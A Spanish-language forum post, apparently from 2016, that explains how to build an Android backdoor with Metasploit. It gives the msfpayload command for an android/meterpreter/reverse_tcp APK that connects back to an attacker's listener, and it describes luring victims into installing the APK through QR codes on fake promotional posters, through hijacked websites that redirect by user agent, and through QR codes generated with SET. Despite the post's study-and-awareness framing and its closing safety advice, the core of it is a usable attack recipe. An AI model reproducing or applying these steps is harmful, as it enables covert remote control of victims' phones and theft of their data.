Payload meterpreter para Android: Backdoor

Iniciado por graphixx, Enero 08, 2016, 01:06:47 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 08, 2016, 01:06:47 PM Ultima modificación: Enero 09, 2016, 01:08:01 PM por Gabriela

En  seguridad cada día es más importante tener protegido nuestro Smartphone para no encontrarnos con sorpresas.Por lo tanto hoy quiero hablar de un payload de Metasploit que nos permite generar nuestro Payload y obtener un meterpreter para el control del dispositivo via comandos. Quiero explicar esto ya que es posible que alguien vea carteles con codigos QR que en el fondo quieran hacer uso de estas técnicas. Por otro lado el uso de este artículo fue para realizar un  estudio sobre los  terminales con  Android que dispongo y de ese modo  ver las opciones que me posibilitaba al instalar este meterpreter en el  móvil,  controlando por control remoto el mismo.

Imaginaros que en caso de perderle o robo tendría acceso a él también. Como he comentado esto es para estudio aunque en el caso que se utilice con malas intenciones un usuario mal intencionado se podría hacer con el control de miles de dispositivos.

Normalmente para este tipo de ataques se hace uso de la ingeniería social usando códigos QR  junto con un cartel o propaganda engañosa indicando que regalan  móviles o tablets. Aunque mucha gente no se fia de estos anuncios, aun son muchos los que lo descargan. Imaginar el caso de un cartel de cine con descuento en las entradas en la entrada del mismo. Aunque creamos mentira la gente descarga sin ningún problema y lo instala en su móvil. Este método tiene como fin engañar al usuario para que se descargue e instale la aplicación  y sin que el lo sepa en ese momento esta controlado por otro usuario.

Otra opción muy utilizada  por los malos es de hacerse con el control de servidores web que mediante javascript nos re-direccionan o abren nuevas ventanas donde está alojado el APK de modo que la aplicación nos solicite la instalación en el momento al abrirla con el móvil. Esto es posible indentificando el  user agent, el problema viene por que la gente confía en la página que está visitando y al abrirse desde la misma tambien confia en ella y esto provoca que se instale la aplicacion al confiar en el origen. Podemos hacer pruebas en nuestro  laboratorio de casa solo necesitamos metasploit que podemos encontrarlo en el a distribución de Kali.

Citar
$ msfupdate  — Actualizamos metasploit

Después de esto procederemos a crear nuestro payload para Android que se encuentra disponible en el framework de metasploit. Usaremos el msfpayload:

msfpayload android/meterpreter/reverse_tcp LHOST="La ip del servidor donde tenemos metasploit escuchando" R > blogtecnico.net.apk

LHOST=  es donde se añade la ip donde se conectara la APK al instalarse.

Con estos simples pasos ya disponemos de nuestra aplicación maliciosa para controlar un terminal móvil. Como he comentado antes es posible utilizar diversos medios para hacer que el usuario la descargue y aquí entra la astucia del hacker. Si os preguntáis como crear un código QR solo tenéis que cargar la aplicación SET y generar el código QR con la opción 9.

Por lo tanto quiero recomendar que no acepteis la instalacion de cualquier APK que os lo solicite si no confiais en el origen de la misma al igual que en el propiertario.

En security by Default crearon No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sobre su funcionamiento interno no perdais la oportunidad de leerlo.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mi Blog Personal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta